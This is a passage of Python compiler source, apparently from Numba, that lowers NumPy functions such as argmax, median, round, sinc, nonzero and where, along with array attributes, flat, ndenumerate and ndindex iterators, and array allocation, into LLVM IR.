return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmax, types.Kind(types.Array))
@implement("array.argmax", types.Kind(types.Array))
def array_argmax(context, builder, sig, args):
def array_argmax_impl(arry):
for v in arry.flat:
max_value = v
max_idx = 0
break
idx = 0
for v in arry.flat:
if v > max_value:
max_value = v
max_idx = idx
idx += 1
return max_idx
res = context.compile_internal(builder, array_argmax_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.median, types.Kind(types.Array))
def array_median(context, builder, sig, args):
def partition(A, low, high):
mid = (low+high) // 2
# median of three {low, middle, high}
LM = A[low] <= A[mid]
MH = A[mid] <= A[high]
LH = A[low] <= A[high]
if LM == MH:
median3 = mid
elif LH != LM:
median3 = low
else:
median3 = high
# choose median3 as the pivot
A[high], A[median3] = A[median3], A[high]
x = A[high]
i = low
for j in range(low, high):
if A[j] <= x:
A[i], A[j] = A[j], A[i]
i += 1
A[i], A[high] = A[high], A[i]
return i
sig_partition = typing.signature(types.intp, *(sig.args[0], types.intp, types.intp))
_partition = context.compile_subroutine(builder, partition, sig_partition)
def select(arry, k):
n = arry.shape[0]
# XXX: assuming flat array till array.flatten is implemented
# temp_arry = arry.flatten()
temp_arry = arry.copy()
high = n-1
low = 0
# NOTE: high is inclusive
i = _partition(temp_arry, low, high)
while i != k:
if i < k:
low = i+1
i = _partition(temp_arry, low, high)
else:
high = i-1
i = _partition(temp_arry, low, high)
return temp_arry[k]
sig_select = typing.signature(sig.args[0].dtype, *(sig.args[0], types.intp))
_select = context.compile_subroutine(builder, select, sig_select)
def median(arry):
n = arry.shape[0]
if n % 2 == 0:
return (_select(arry, n//2 - 1) + _select(arry, n//2))/2
else:
return _select(arry, n//2)
res = context.compile_internal(builder, median, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
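# The partition()/select() helpers above amount to a median-of-three quickselect
# over a copy of the input (assumed 1d, see the XXX note), so the median is
# obtained in expected linear time without fully sorting the array; for
# even-sized inputs the two middle elements are averaged.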
def _np_round_intrinsic(tp):
# np.round() always rounds half to even
return "llvm.rint.f%d" % (tp.bitwidth,)
def _np_round_float(context, builder, tp, val):
llty = context.get_value_type(tp)
module = builder.module
fnty = lc.Type.function(llty, [llty])
fn = module.get_or_insert_function(fnty, name=_np_round_intrinsic(tp))
return builder.call(fn, (val,))
@builtin
@implement(numpy.round, types.Kind(types.Float))
def scalar_round_unary(context, builder, sig, args):
res = _np_round_float(context, builder, sig.args[0], args[0])
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Integer))
def scalar_round_unary(context, builder, sig, args):
res = args[0]
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex))
def scalar_round_unary_complex(context, builder, sig, args):
fltty = sig.args[0].underlying_float
cplx_cls = context.make_complex(sig.args[0])
z = cplx_cls(context, builder, args[0])
z.real = _np_round_float(context, builder, fltty, z.real)
z.imag = _np_round_float(context, builder, fltty, z.imag)
res = z._getvalue()
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Float), types.Kind(types.Integer))
@implement(numpy.round, types.Kind(types.Integer), types.Kind(types.Integer))
def scalar_round_binary_float(context, builder, sig, args):
def round_ndigits(x, ndigits):
if math.isinf(x) or math.isnan(x):
return x
# NOTE: this is CPython's algorithm, but perhaps this is overkill
# when emulating Numpy's behaviour.
if ndigits >= 0:
if ndigits > 22:
# pow1 and pow2 are each safe from overflow, but
# pow1*pow2 ~= pow(10.0, ndigits) might overflow.
pow1 = 10.0 ** (ndigits - 22)
pow2 = 1e22
else:
pow1 = 10.0 ** ndigits
pow2 = 1.0
y = (x * pow1) * pow2
if math.isinf(y):
return x
return (numpy.round(y) / pow2) / pow1
else:
pow1 = 10.0 ** (-ndigits)
y = x / pow1
return numpy.round(y) * pow1
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex), types.Kind(types.Integer))
def scalar_round_binary_complex(context, builder, sig, args):
def round_ndigits(z, ndigits):
return complex(numpy.round(z.real, ndigits),
numpy.round(z.imag, ndigits))
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Array), types.Kind(types.Integer),
types.Kind(types.Array))
def array_round(context, builder, sig, args):
def array_round_impl(arr, decimals, out):
if arr.shape != out.shape:
raise ValueError("invalid output shape")
for index, val in numpy.ndenumerate(arr):
out[index] = numpy.round(val, decimals)
return out
res = context.compile_internal(builder, array_round_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Array))
def array_sinc(context, builder, sig, args):
def array_sinc_impl(arr):
out = numpy.zeros_like(arr)
for index, val in numpy.ndenumerate(arr):
out[index] = numpy.sinc(val)
return out
res = context.compile_internal(builder, array_sinc_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Number))
def scalar_sinc(context, builder, sig, args):
scalar_dtype = sig.return_type
def scalar_sinc_impl(val):
if numpy.fabs(val) == 0.e0: # to match np impl
val = 1e-20
val *= numpy.pi # np sinc is the normalised variant
return numpy.sin(val)/val
res = context.compile_internal(builder, scalar_sinc_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.nonzero, types.Kind(types.Array))
@implement("array.nonzero", types.Kind(types.Array))
@implement(numpy.where, types.Kind(types.Array))
def array_nonzero(context, builder, sig, args):
aryty = sig.args[0]
# Return type is a N-tuple of 1D C-contiguous arrays
retty = sig.return_type
outaryty = retty.dtype
ndim = aryty.ndim
nouts = retty.count
ary = make_array(aryty)(context, builder, args[0])
shape = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
layout = aryty.layout
# First count the number of non-zero elements
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
count = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
builder.store(builder.add(builder.load(count), one), count)
# Then allocate output arrays of the right size
out_shape = (builder.load(count),)
outs = [_empty_nd_impl(context, builder, outaryty, out_shape)._getvalue()
for i in range(nouts)]
outarys = [make_array(outaryty)(context, builder, out) for out in outs]
out_datas = [out.data for out in outarys]
# And fill them up
index = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
# Store element indices in output arrays
if not indices:
# For a 0-d array, store 0 in the unique output array
indices = (zero,)
cur = builder.load(index)
for i in range(nouts):
ptr = cgutils.get_item_pointer2(builder, out_datas[i],
out_shape, (),
'C', [cur])
store_item(context, builder, outaryty, indices[i], ptr)
builder.store(builder.add(cur, one), index)
tup = context.make_tuple(builder, sig.return_type, outs)
return impl_ret_new_ref(context, builder, sig.return_type, tup)
@builtin
@implement(numpy.where, types.Kind(types.Array),
types.Kind(types.Array), types.Kind(types.Array))
def array_where(context, builder, sig, args):
layouts = set(a.layout for a in sig.args)
if layouts == set('C'):
# Faster implementation for C-contiguous arrays
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
cf = cond.flat
xf = x.flat
yf = y.flat
rf = res.flat
for i in range(cond.size):
rf[i] = xf[i] if cf[i] else yf[i]
return res
else:
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
for idx, c in numpy.ndenumerate(cond):
res[idx] = x[idx] if c else y[idx]
return res
res = context.compile_internal(builder, where_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Array attributes
@builtin_attr
@impl_attribute(types.Kind(types.Array), "dtype", types.Kind(types.DType))
def array_dtype(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "shape", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "shape", types.Kind(types.UniTuple))
def array_shape(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.shape
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "strides", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "strides", types.Kind(types.UniTuple))
def array_strides(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.strides
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ndim", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "ndim", types.intp)
def array_ndim(context, builder, typ, value):
res = context.get_constant(types.intp, typ.ndim)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "size", types.intp)
def array_size(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.nitems
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "itemsize", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "itemsize", types.intp)
def array_itemsize(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.itemsize
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "nbytes", types.intp)
def array_nbytes(context, builder, typ, value):
"""
nbytes = size * itemsize
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
dims = cgutils.unpack_tuple(builder, array.shape, typ.ndim)
res = builder.mul(array.nitems, array.itemsize)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "contiguous", types.boolean)
def array_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "c_contiguous", types.boolean)
def array_c_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_c_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "f_contiguous", types.boolean)
def array_f_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_f_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "readonly", types.boolean)
def array_readonly(context, builder, typ, value):
res = context.get_constant(types.boolean, not typ.mutable)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ctypes",
types.Kind(types.ArrayCTypes))
def array_ctypes(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
# Cast void* data to uintp
addr = builder.ptrtoint(array.data, context.get_value_type(types.uintp))
# Create new ArrayCType structure
ctinfo_type = cgutils.create_struct_proxy(types.ArrayCTypes(typ))
ctinfo = ctinfo_type(context, builder)
ctinfo.data = addr
res = ctinfo._getvalue()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flags", types.Kind(types.ArrayFlags))
def array_flags(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayCTypes), "data", types.uintp)
def array_ctypes_data(context, builder, typ, value):
ctinfo_type = cgutils.create_struct_proxy(typ)
ctinfo = ctinfo_type(context, builder, value=value)
res = ctinfo.data
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "contiguous", types.boolean)
@impl_attribute(types.Kind(types.ArrayFlags), "c_contiguous", types.boolean)
def array_ctypes_data(context, builder, typ, value):
val = typ.array_type.layout == 'C'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "f_contiguous", types.boolean)
def array_ctypes_data(context, builder, typ, value):
layout = typ.array_type.layout
val = layout == 'F' if typ.array_type.ndim > 1 else layout in 'CF'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute_generic(types.Kind(types.Array))
def array_record_getattr(context, builder, typ, value, attr):
"""
Generic getattr() implementation for record arrays: fetch the given
record member, i.e. a subarray.
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
rectype = typ.dtype
if not isinstance(rectype, types.Record):
raise AttributeError("attribute %r of %s not defined" % (attr, typ))
dtype = rectype.typeof(attr)
offset = rectype.offset(attr)
resty = typ.copy(dtype=dtype, layout='A')
raryty = make_array(resty)
rary = raryty(context, builder)
constoffset = context.get_constant(types.intp, offset)
llintp = context.get_value_type(types.intp)
newdata = builder.add(builder.ptrtoint(array.data, llintp), constoffset)
newdataptr = builder.inttoptr(newdata, rary.data.type)
datasize = context.get_abi_sizeof(context.get_data_type(dtype))
populate_array(rary,
data=newdataptr,
shape=array.shape,
strides=array.strides,
itemsize=context.get_constant(types.intp, datasize),
meminfo=array.meminfo,
parent=array.parent)
res = rary._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
#-------------------------------------------------------------------------------
# Comparisons
@builtin
@implement('is', types.Kind(types.Array), types.Kind(types.Array))
def array_is(context, builder, sig, args):
aty, bty = sig.args
if aty != bty:
return cgutils.false_bit
def array_is_impl(a, b):
return (a.shape == b.shape and
a.strides == b.strides and
a.ctypes.data == b.ctypes.data)
return context.compile_internal(builder, array_is_impl, sig, args)
#-------------------------------------------------------------------------------
# builtin `numpy.flat` implementation
def make_array_flat_cls(flatiterty):
"""
Return the Structure representation of the given *flatiterty* (an
instance of types.NumpyFlatType).
"""
return _make_flattening_iter_cls(flatiterty, 'flat')
def make_array_ndenumerate_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdEnumerateType).
"""
return _make_flattening_iter_cls(nditerty, 'ndenumerate')
def _increment_indices(context, builder, ndim, shape, indices, end_flag=None):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end_increment')
if end_flag is not None:
builder.store(cgutils.false_byte, end_flag)
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = increment_index(builder, builder.load(idxptr))
count = shape[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
builder.store(idx, idxptr)
builder.branch(bbend)
builder.store(zero, idxptr)
if end_flag is not None:
builder.store(cgutils.true_byte, end_flag)
builder.branch(bbend)
builder.position_at_end(bbend)
def _increment_indices_array(context, builder, arrty, arr, indices, end_flag=None):
shape = cgutils.unpack_tuple(builder, arr.shape, arrty.ndim)
_increment_indices(context, builder, arrty.ndim, shape, indices, end_flag)
def make_ndindex_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdIndexType).
"""
ndim = nditerty.ndim
class NdIndexIter(cgutils.create_struct_proxy(nditerty)):
"""
.ndindex() implementation.
"""
def init_specific(self, context, builder, shapes):
zero = context.get_constant(types.intp, 0)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
ndim))
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic.
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.exhausted = exhausted
self.shape = cgutils.pack_array(builder, shapes, zero.type)
def iternext_specific(self, context, builder, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
exhausted = cgutils.as_bool_bit(builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, exhausted):
result.set_valid(False)
builder.branch(bbend)
indices = [builder.load(cgutils.gep_inbounds(builder, self.indices, dim))
for dim in range(ndim)]
for load in indices:
mark_positive(builder, load)
result.yield_(cgutils.pack_array(builder, indices, zero.type))
result.set_valid(True)
shape = cgutils.unpack_tuple(builder, self.shape, ndim)
_increment_indices(context, builder, ndim, shape,
self.indices, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
return NdIndexIter
def _make_flattening_iter_cls(flatiterty, kind):
assert kind in ('flat', 'ndenumerate')
array_type = flatiterty.array_type
dtype = array_type.dtype
if array_type.layout == 'C':
class CContiguousFlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
.flat() / .ndenumerate() implementation for C-contiguous arrays.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
self.index = cgutils.alloca_once_value(builder, zero)
# We can't trust strides[-1] to always contain the right
# step value, see
# http://docs.scipy.org/doc/numpy-dev/release.html#npy-relaxed-strides-checking
self.stride = arr.itemsize
if kind == 'ndenumerate':
# Zero-initialize the indices array.
indices = cgutils.alloca_once(
builder, zero.type,
size=context.get_constant(types.intp, arrty.ndim))
for dim in range(arrty.ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
self.indices = indices
# NOTE: Using gep() instead of explicit pointer addition helps
# LLVM vectorize the loop (since the stride is known and
# constant). This is not possible in the non-contiguous case,
# where the strides are unknown at compile-time.
def iternext_specific(self, context, builder, arrty, arr, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
ndim = arrty.ndim
nitems = arr.nitems
index = builder.load(self.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with cgutils.if_likely(builder, is_valid):
ptr = builder.gep(arr.data, [index])
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate(): fetch and increment indices
indices = self.indices
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
_increment_indices_array(context, builder, arrty, arr, indices)
index = builder.add(index, one)
builder.store(index, self.index)
def getitem(self, context, builder, arrty, arr, index):
ptr = builder.gep(arr.data, [index])
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = builder.gep(arr.data, [index])
store_item(context, builder, arrty, value, ptr)
return CContiguousFlatIter
else:
class FlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
Generic .flat() / .ndenumerate() implementation for
non-contiguous arrays.
It keeps track of pointers along each dimension in order to
minimize computations.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
data = arr.data
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
arrty.ndim))
pointers = cgutils.alloca_once(builder, data.type,
size=context.get_constant(types.intp,
arrty.ndim))
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
# Initialize indices and pointers with their start values.
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
builder.store(data, ptrptr)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic (see issue #846).
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.pointers = pointers
self.exhausted = exhausted
def iternext_specific(self, context, builder, arrty, arr, result):
ndim = arrty.ndim
data = arr.data
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
indices = self.indices
pointers = self.pointers
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
# Catch already computed iterator exhaustion
is_exhausted = cgutils.as_bool_bit(
builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, is_exhausted):
result.set_valid(False)
builder.branch(bbend)
result.set_valid(True)
# Current pointer inside last dimension
last_ptr = cgutils.gep_inbounds(builder, pointers, ndim - 1)
ptr = builder.load(last_ptr)
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate() => yield (indices, value)
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
# Update indices and pointers by walking from inner
# dimension to outer.
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = builder.add(builder.load(idxptr), one)
count = shapes[dim]
stride = strides[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
# Index is valid => pointer can simply be incremented.
builder.store(idx, idxptr)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
ptr = builder.load(ptrptr)
ptr = cgutils.pointer_add(builder, ptr, stride)
builder.store(ptr, ptrptr)
# Reset pointers in inner dimensions
for inner_dim in range(dim + 1, ndim):
ptrptr = cgutils.gep_inbounds(builder, pointers, inner_dim)
builder.store(ptr, ptrptr)
builder.branch(bbend)
# Reset index and continue with next dimension
builder.store(zero, idxptr)
# End of array
builder.store(cgutils.true_byte, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
def _ptr_for_index(self, context, builder, arrty, arr, index):
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, count=ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, count=ndim)
# First convert the flattened index into a regular n-dim index
indices = []
for dim in reversed(range(ndim)):
indices.append(builder.urem(index, shapes[dim]))
index = builder.udiv(index, shapes[dim])
indices.reverse()
ptr = cgutils.get_item_pointer2(builder, arr.data, shapes,
strides, arrty.layout, indices)
return ptr
def getitem(self, context, builder, arrty, arr, index):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
store_item(context, builder, arrty, value, ptr)
return FlatIter
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flat", types.Kind(types.NumpyFlatType))
def make_array_flatiter(context, builder, arrty, arr):
flatitercls = make_array_flat_cls(types.NumpyFlatType(arrty))
flatiter = flatitercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
flatiter.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
flatiter.init_specific(context, builder, arrty, arr)
res = flatiter._getvalue()
return impl_ret_borrowed(context, builder, types.NumpyFlatType(arrty), res)
@builtin
@implement('iternext', types.Kind(types.NumpyFlatType))
@iternext_impl
def iternext_numpy_flatiter(context, builder, sig, args, result):
[flatiterty] = sig.args
[flatiter] = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
flatiter.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement('getitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer))
def iternext_numpy_getitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.getitem(context, builder, arrty, arr, index)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer),
types.Any)
def iternext_numpy_getitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index, value = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.setitem(context, builder, arrty, arr, index, value)
return context.get_dummy_value()
@builtin
@implement(numpy.ndenumerate, types.Kind(types.Array))
def make_array_ndenumerate(context, builder, sig, args):
arrty, = sig.args
arr, = args
nditercls = make_array_ndenumerate_cls(types.NumpyNdEnumerateType(arrty))
nditer = nditercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
nditer.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
nditer.init_specific(context, builder, arrty, arr)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdEnumerateType))
@iternext_impl
def iternext_numpy_nditer(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_array_ndenumerate_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
arrty = nditerty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(nditer.array))
nditer.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement(numpy.ndindex, types.VarArg(types.Kind(types.Integer)))
def make_array_ndindex(context, builder, sig, args):
"""ndindex(*shape)"""
shape = [context.cast(builder, arg, argty, types.intp)
for argty, arg in zip(sig.args, args)]
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ndindex, types.Kind(types.BaseTuple))
def make_array_ndindex(context, builder, sig, args):
"""ndindex(shape)"""
ndim = sig.return_type.ndim
if ndim > 0:
idxty = sig.args[0].dtype
tup = args[0]
shape = cgutils.unpack_tuple(builder, tup, ndim)
shape = [context.cast(builder, idx, idxty, types.intp)
for idx in shape]
else:
shape = []
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdIndexType))
@iternext_impl
def iternext_numpy_ndindex(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_ndindex_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
nditer.iternext_specific(context, builder, result)
# -----------------------------------------------------------------------------
# Numpy array constructors
def _empty_nd_impl(context, builder, arrtype, shapes):
"""Utility function used for allocating a new array during LLVM code
generation (lowering). Given a target context, builder, array
    type, and a tuple or list of lowered dimension sizes, returns the
    array structure proxy for a Numba runtime allocated array (callers
    use its _getvalue() method to obtain the LLVM value).
"""
arycls = make_array(arrtype)
ary = arycls(context, builder)
datatype = context.get_data_type(arrtype.dtype)
itemsize = context.get_constant(types.intp,
context.get_abi_sizeof(datatype))
# compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
if arrtype.ndim == 0:
strides = ()
elif arrtype.layout == 'C':
strides = [itemsize]
for dimension_size in reversed(shapes[1:]):
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(reversed(strides))
elif arrtype.layout == 'F':
strides = [itemsize]
for dimension_size in shapes[:-1]:
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(strides)
else:
raise NotImplementedError(
"Don't know how to allocate array with layout '{0}'.".format(
arrtype.layout))
allocsize = builder.mul(itemsize, arrlen)
    # NOTE: AVX prefers 32-byte alignment
meminfo = context.nrt_meminfo_alloc_aligned(builder, size=allocsize,
align=32)
data = context.nrt_meminfo_data(builder, meminfo)
intp_t = context.get_value_type(types.intp)
shape_array = cgutils.pack_array(builder, shapes, ty=intp_t)
strides_array = cgutils.pack_array(builder, strides, ty=intp_t)
populate_array(ary,
data=builder.bitcast(data, datatype.as_pointer()),
shape=shape_array,
strides=strides_array,
itemsize=itemsize,
meminfo=meminfo)
return ary
def _zero_fill_array(context, builder, ary):
"""
Zero-fill an array. The array must be contiguous.
"""
cgutils.memset(builder, ary.data, builder.mul(ary.itemsize, ary.nitems), 0)
def _parse_empty_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty(), np.zeros() or np.ones() call.
"""
arrshapetype = sig.args[0]
arrshape = args[0]
arrtype = sig.return_type
if isinstance(arrshapetype, types.Integer):
ndim = 1
shapes = [context.cast(builder, arrshape, arrshapetype, types.intp)]
else:
ndim = arrshapetype.count
arrshape = context.cast(builder, arrshape, arrshapetype,
types.UniTuple(types.intp, ndim))
shapes = cgutils.unpack_tuple(builder, arrshape, count=ndim)
zero = context.get_constant_generic(builder, types.intp, 0)
for dim in range(ndim):
